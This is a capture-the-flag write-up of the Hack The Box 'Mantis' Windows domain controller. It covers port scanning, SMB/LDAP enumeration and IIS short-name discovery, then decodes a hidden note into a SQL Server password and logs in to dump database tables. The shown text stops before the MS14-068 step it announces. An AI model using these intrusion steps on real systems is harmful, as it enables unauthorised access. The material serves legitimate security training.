
Mantis HTB

Mantis

Mantis was one of those Windows targets where it’s just a ton of enumeration until you get a System shell. The exploit is MS14-068, where a low-privilege domain user was allowed to obtain a Kerberos ticket carrying privileged group membership.

  • Nmap
  • Recon
  • SQL credentials lead to the user james
  • ms14-068.py: a low-privilege user forges a ticket to impersonate an administrator and reach System

Nmap

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-23 02:25:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| ms-sql-info: 
|   10.129.167.60:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-07-22T22:26:38-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-23T02:26:42z
|_  start_date: 2021-07-23T02:24:20
PORT      STATE SERVICE  VERSION
1337/tcp  open  http     Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp  open  ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after:  2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
5722/tcp  open  msrpc    Microsoft Windows RPC
9389/tcp  open  mc-nmf   .NET Message Framing
47001/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc    Microsoft Windows RPC
49164/tcp open  msrpc    Microsoft Windows RPC
49166/tcp open  msrpc    Microsoft Windows RPC
49168/tcp open  msrpc    Microsoft Windows RPC
50255/tcp open  ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after:  2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info: 
|   10.129.167.60:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

We have a good number of ports open. Let’s enumerate and gather as much information as possible.
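Before going port by port, it helps to turn the scan into a structured inventory and read off what the open services say about the host’s role: Kerberos on 88 next to LDAP on 389/3268 means we are looking at a domain controller, and the LDAP banner already names the domain. The parser below is an added example, not part of the original writeup; the sample scan text is constructed to look like the Nmap normal output above, and the port-to-role table is my own.

```python
import re

# Constructed sample in Nmap's normal output format (shaped like the scan above).
SAMPLE_NMAP = """\
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-23 02:25:41Z)
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   DNS_Computer_Name: mantis.htb.local
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
8080/tcp  open  http         Microsoft IIS httpd 7.5
"""

# One "PORT STATE SERVICE VERSION" line; NSE script lines start with '|' and do not match.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return a list of dicts, one per port line in Nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


# Services that, taken together, indicate a domain controller rather than a member server.
DC_INDICATORS = {
    88: "kerberos",
    464: "kpasswd",
    389: "ldap",
    636: "ldaps",
    3268: "global catalog",
    3269: "global catalog (tls)",
}


def domain_controller_evidence(ports):
    """Open ports on the host that belong to the DC indicator set, sorted."""
    return sorted(p["port"] for p in ports
                  if p["state"] == "open" and p["port"] in DC_INDICATORS)


def is_domain_controller(ports):
    """Kerberos plus at least one LDAP/GC listener is the minimal DC signature."""
    found = set(domain_controller_evidence(ports))
    return 88 in found and bool(found & {389, 636, 3268, 3269})


def extract_domain(ports):
    """Pull the AD domain name out of the LDAP version banner, if Nmap printed one."""
    for p in ports:
        m = re.search(r"Domain:\s*([\w.-]+)", p["version"])
        if m:
            return m.group(1)
    return None


def extract_fqdn(text):
    """The ms-sql-ntlm-info script leaks the host FQDN; grab it from the raw text."""
    m = re.search(r"DNS_Computer_Name:\s*(\S+)", text)
    return m.group(1) if m else None


if __name__ == "__main__":
    inventory = parse_ports(SAMPLE_NMAP)
    print("DC evidence:", domain_controller_evidence(inventory))
    print("domain:", extract_domain(inventory), "fqdn:", extract_fqdn(SAMPLE_NMAP))
```

Running this against the full scan gives the same two facts the rest of the enumeration below confirms by hand: the target is the DC for htb.local and its FQDN is mantis.htb.local, which is exactly what ends up in /etc/hosts and krb5.conf later.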

Port 53

dig @10.129.167.60 -x 10.129.167.60

No PTR records. Let’s skip this for now.

Ports 135, 139, 445: enumerate RPC/SMB information

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 23 09:42:29 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.129.167.60
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.129.167.60    |
 ===================================================== 
[E] Can;t find workgroup/domain


 ============================================= 
|    Nbtstat Information for 10.129.167.60    |
 ============================================= 
Looking up status of 10.129.167.60
No reply from 10.129.167.60

 ====================================== 
|    Session Check on 10.129.167.60    |
 ====================================== 
[+] Server 10.129.167.60 allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 ============================================ 
|    Getting domain SID for 10.129.167.60    |
 ============================================ 
Domain Name: HTB
Domain Sid: S-1-5-21-4220043660-4019079961-2895681657
[+] Host is part of a domain (not a workgroup)

 ======================================= 
|    OS information on 10.129.167.60    |
 ======================================= 
[+] Got OS info for 10.129.167.60 from smbclient: 
[+] Got OS info for 10.129.167.60 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================== 
|    Users on 10.129.167.60    |
 ============================== 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================== 
|    Share Enumeration on 10.129.167.60    |
 ========================================== 

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.129.167.60

 ===================================================== 
|    Password Policy Information for 10.129.167.60    |
 ===================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.129.167.60 using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.129.167.60)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.


[E] Failed to get password policy with rpcclient


 =============================== 
|    Groups on 10.129.167.60    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 10.129.167.60 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================== 
|    Getting printer info for 10.129.167.60    |
 ============================================== 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Fri Jul 23 09:43:19 2021
____ $crackmapexec smb 10.129.167.60 -u "" -p "" --shares 
SMB         10.129.167.60   445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.167.60   445    MANTIS           [-] htb.local\: STATUS_ACCESS_DENIED 
SMB         10.129.167.60   445    MANTIS           [-] Error enumerating shares: STATUS_ACCESS_DENIED

Anonymous authentication is disabled. So we need a user to get all the details.

____ $ldapsearch -h 10.129.167.60 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

We have a domain htb.local. Let’s add it to our /etc/hosts file.

____ $ldapsearch -h 10.129.167.60 -x -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
currentTime: 20210723041730.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=MANTIS,CN=Servers,CN=Default-First-Site-Nam
 e,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 127061
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: mantis.htb.local
ldapServiceName: htb.local:mantis$@HTB.LOCAL
serverName: CN=MANTIS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config
 uration,DC=htb,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

We also have the host name mantis.htb.local (dnsHostName); let’s save it as well.

Port 1337

[Pasted image 20210723103411.png]

Let’s brute-force directories and see if anything turns up.

____ $ffuf -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://htb.local:1337/FUZZ -e aspx,asp

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1-dev                                              
________________________________________________

 :: Method           : GET                                     
 :: URL              : http://htb.local:1337/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt                         
 :: Extensions       : aspx asp 
 :: Follow redirects : false                                   
 :: Calibration      : false                                   
 :: Timeout          : 10                                      
 :: Threads          : 40                                      
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405                                                        
________________________________________________

aspnet_client           [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 166ms]                                          
                        [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 165ms]                                        
:: Progress: [79752/79752] :: Job [1/1] :: 232 req/sec :: Duration: [0:05:35] :: Errors: 6 ::         

We did not find much. Since this version of IIS is affected by the short-name (8.3) disclosure vulnerability, let’s try the IIS short-name scanner instead.

____ $java -jar iis_shortname_scanner.jar 2 20 http://htb.local:1337/
magicFileName: *~1*                                            
requestMethodDelimiter: ,        
requestMethod: DEBUG,OPTIONS,GET,POST,HEAD,TRACE               
nameStartsWith:                                                
extStartsWith:                                                 
hassleFree: true                                               
cookies: IIS_Tilde_Scanner=1;
outputFile: iis_shortname_scanner_logfile.txt                  
acceptableDifferenceLengthBetweenResponses: 10
proxyServerPort: 
magicFinalPartList: \a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,/a.xxx
headersDelimiter: @@
saveOutput: false
maxNumericalPart: 3
headers: X-Forwarded-For: 127.0.0.1@@X-Originating-IP: 127.0.0.1@@X-Cluster-Client-Ip: 127.0.0.1
useProvidedURLWithoutChange: false
debug: false
maxConnectionTimeOut: 20000
magicFinalPartDelimiter: ,
forceNumericalPart: 1
userAgent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
inScopeCharacters: ETAONRISHDLFCMUGYPWBVKJXQZ0123456789_-$~()&!#%'@^`{}
asteriskSymbol: *
showActualNames: true
maxRetryTimes: 10
maxDelayAfterEachRequest: 1
magicFileExtension: *
URLSuffix: ?&aspxerrorpath=/
questionMarkSymbol: ?

-- Current Configuration -- Begin
Scan Mode: ALL
Number of threads: 20
Config file: config.xml
Scanner version: 2.3.9 (05 February 2017)
-- Current Configuration -- End
Max delay after each request in milliseconds = 1
No proxy has been used.

Scanning...

Testing request method: "DEBUG" with magic part: "\a.aspx" ...
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by IISShortNameScanner.IIS_ShortName_Scanner (file:/opt/tools/IIS-ShortName-Scanner/iis_shortname_scanner.jar) to field java.net.HttpURLConnection.method
WARNING: Please consider reporting this to the maintainers of IISShortNameScanner.IIS_ShortName_Scanner
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Testing request method: "OPTIONS" with magic part: "\a.aspx" ...
Dir: ASPNET~1
Dir: SECURE~1
[-] SECURU
# IIS Short Name (8.3) Scanner version 2.3.9 (05 February 2017) - scan initiated 2021/07/23 11:55:07
Target: http://htb.local:1337/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): \a.aspx
|_ Extra information:
  |_ Number of sent requests: 268
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ SECURE~1
  |_ Indentified files: 0

Finished in: 19 second(s)

We have a directory whose name starts with SECURE.

____ $grep -E "\bsecure" /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt > secure.txt
____ $ffuf -w secure.txt -u http://htb.local:1337/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://htb.local:1337/FUZZ
 :: Wordlist         : FUZZ: secure.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

secure_notes            [Status: 301, Size: 158, Words: 9, Lines: 2, Duration: 328ms]
:: Progress: [391/391] :: Job [1/1] :: 227 req/sec :: Duration: [0:00:02] :: Errors: 0 ::
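The grep above works because of how Windows derives 8.3 short names: the long name is upper-cased, dots and spaces are dropped, the first six characters are kept and `~1` is appended (so `secure_notes` becomes `SECURE~1`, and `aspnet_client` becomes `ASPNET~1`). The code below is an added example, not part of the original writeup or the scanner; it models that derivation and uses it to narrow a wordlist to entries that could produce a given short name. The sample wordlist is constructed, and collision numbering (`~2`, `~3`, ...) is deliberately not modelled.

```python
# Characters other than letters and digits that are legal in an 8.3 name.
_ALLOWED_SPECIAL = set("$%'-_@~`!(){}^#&")


def short_name_8_3(long_name):
    """Approximate the 8.3 short name Windows generates for a file or directory name.

    Only the first short name for a prefix ("~1") is modelled; if two long names
    share the first six characters Windows would number the second one "~2".
    """
    name = long_name.upper()
    if "." in name:
        base, ext = name.rsplit(".", 1)   # everything before the last dot is the base
    else:
        base, ext = name, ""
    base = base.replace(".", "").replace(" ", "")
    base = "".join(c if c.isalnum() or c in _ALLOWED_SPECIAL else "_" for c in base)
    ext = "".join(c for c in ext if c.isalnum() or c in _ALLOWED_SPECIAL)
    candidate = base + ("." + ext if ext else "")
    # A name that is already a valid 8.3 name keeps its own (upper-cased) form.
    if len(base) <= 8 and len(ext) <= 3 and candidate == name:
        return candidate
    return base[:6] + "~1" + ("." + ext[:3] if ext else "")


def expand_short_name(short, wordlist):
    """Wordlist entries whose generated 8.3 name equals `short` (case-insensitive)."""
    short = short.upper()
    return [w for w in wordlist if short_name_8_3(w) == short]


# Constructed wordlist fragment standing in for a SecLists file.
SAMPLE_WORDLIST = ["secure", "secure_notes", "securities", "admin", "secureapp", "aspnet_client"]

if __name__ == "__main__":
    print(short_name_8_3("secure_notes"))                      # SECURE~1
    print(expand_short_name("SECURE~1", SAMPLE_WORDLIST))      # ['secure_notes', 'secureapp']
```

Note that a plain `grep "\bsecure"` over-approximates: `securities` matches the grep but can never be `SECURE~1` (its short name is `SECURI~1`), while the short-name filter keeps only candidates whose first six characters match. Knowing this mapping is also the defensive takeaway: disabling 8.3 name generation (`fsutil 8dot3name`) on the web root removes the information the scanner relies on.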

We have a directory named secure_notes. Let’s access it and check.

[Pasted image 20210723120137.png]

[Pasted image 20210723120227.png]

[Pasted image 20210723120242.png]

Also, if we take a close look at the URL, the file name looks like it contains some kind of hash:

http://htb.local:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

HASH : NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx

echo -n "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421
___ $hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 6d2424716c5f53405f504073735730726421

 Not Found.
--------------------------------------------------

___$ echo -n "6d2424716c5f53405f504073735730726421" | wc -c
36

Invalid hash. Stuck here for a while. Played with the hash for a while and found it is a hex representation.

____ $echo -n "6d2424716c5f53405f504073735730726421" | xxd -r -p
m$$ql_S@_P@ssW0rd!

We have a user and a password. Let’s see where we can use these creds
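The two manual steps above (base64 out, then hex out) generalise to “keep peeling encoding layers while the result is still printable text”, and the reason hash-identifier said Not Found is simply that 36 hex characters is not the length of any common digest. The helper below is an added example, not part of the original writeup; it applies both checks to the string from the URL and stops when no further layer decodes cleanly.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable) - set("\x0b\x0c")

# Hex-character lengths of the usual unsalted digests; anything else is suspect as a "hash".
HASH_LENGTHS = {32: "MD5", 40: "SHA-1", 56: "SHA-224", 64: "SHA-256", 96: "SHA-384", 128: "SHA-512"}


def _try_hex(s):
    if not s or len(s) % 2 or any(c not in string.hexdigits for c in s):
        return None
    return bytes.fromhex(s)


def _try_base64(s):
    if not s or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True)   # reject anything outside the alphabet
    except (binascii.Error, ValueError):
        return None


def peel_encodings(token, max_depth=5):
    """Strip nested hex / base64 layers while each step yields printable ASCII.

    Returns (innermost_text, [layer names, outermost first]). Hex is tried first
    because it is the stricter alphabet; a hex string is also valid base64, but not vice versa.
    """
    layers, current = [], token
    for _ in range(max_depth):
        for name, decoder in (("hex", _try_hex), ("base64", _try_base64)):
            raw = decoder(current)
            if raw is None:
                continue
            try:
                text = raw.decode("ascii")
            except UnicodeDecodeError:
                continue
            if text and all(c in PRINTABLE for c in text):
                layers.append(name)
                current = text
                break
        else:
            break   # no decoder produced printable text: this is the payload
    return current, layers


def hash_algorithm_for_length(hexstr):
    """Name the digest whose hex length matches, or None (what hash-identifier reported here)."""
    return HASH_LENGTHS.get(len(hexstr))


if __name__ == "__main__":
    token = "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"   # from the page's URL
    print(peel_encodings(token))                               # ('m$$ql_S@_P@ssW0rd!', ['base64', 'hex'])
    print(hash_algorithm_for_length("6d2424716c5f53405f504073735730726421"))   # None
```

The printable-ASCII stop condition is what keeps the loop from “decoding” the final password a third time: `m$$ql_S@_P@ssW0rd!` contains characters outside both alphabets, so both decoders return None and the recursion ends.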

Port 8080

[Pasted image 20210723095612.png]

[Pasted image 20210723130756.png]

Credentials did not work.

Port 1433

____ $impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!'@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select name from master.sys.databases;
name                                                                                                                               

--------------------------------------------------------------------------------------------------------------------------------   

master                                                                                                                             

tempdb                                                                                                                             

model                                                                                                                              

msdb                                                                                                                               

orcharddb                                                                                                                          

SQL> 

We have orcharddb; let’s dump all the information.

SQL> select table_name from orcharddb.information_schema.tables   
table_name
--------------------------------------------------------------------------------------------------------------------------------    
blog_Orchard_Blogs_RecentBlogPostsPartRecord       
blog_Orchard_Blogs_BlogArchivesPartRecord          
blog_Orchard_Workflows_TransitionRecord            
blog_Orchard_Workflows_WorkflowRecord              
blog_Orchard_Workflows_WorkflowDefinitionRecord 
blog_Orchard_Workflows_AwaitingActivityRecord                
blog_Orchard_Workflows_ActivityRecord                        
blog_Orchard_Tags_TagsPartRecord                             
blog_Orchard_Framework_DataMigrationRecord                   
blog_Orchard_Tags_TagRecord                                  
blog_Orchard_Tags_ContentTagRecord                          
blog_Settings_ContentFieldDefinitionRecord                   
blog_Orchard_Framework_DistributedLockRecord                 
blog_Settings_ContentPartDefinitionRecord                    
blog_Settings_ContentPartFieldDefinitionRecord               
blog_Settings_ContentTypeDefinitionRecord                    
blog_Settings_ContentTypePartDefinitionRecord                
blog_Settings_ShellDescriptorRecord                          
blog_Settings_ShellFeatureRecord                             
blog_Settings_ShellFeatureStateRecord                        
blog_Settings_ShellParameterRecord                           
blog_Settings_ShellStateRecord                               
blog_Orchard_Framework_ContentItemRecord                     
blog_Orchard_Framework_ContentItemVersionRecord              
blog_Orchard_Framework_ContentTypeRecord                     
blog_Orchard_Framework_CultureRecord                         
blog_Common_BodyPartRecord                                   
blog_Common_CommonPartRecord                                 
blog_Common_CommonPartVersionRecord                          
blog_Common_IdentityPartRecord                               
blog_Containers_ContainerPartRecord                          
blog_Containers_ContainerWidgetPartRecord                    
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord                                  
blog_Navigation_MenuPartRecord                              
blog_Navigation_AdminMenuPartRecord                         
blog_Scheduling_ScheduledTaskRecord                         
blog_Orchard_ContentPicker_ContentMenuItemPartRecord        
blog_Orchard_Alias_AliasRecord                              
blog_Orchard_Alias_ActionRecord                             
blog_Orchard_Autoroute_AutoroutePartRecord                  
blog_Orchard_Users_UserPartRecord                           
blog_Orchard_Roles_PermissionRecord                         
blog_Orchard_Roles_RoleRecord                               
blog_Orchard_Roles_RolesPermissionsRecord                   
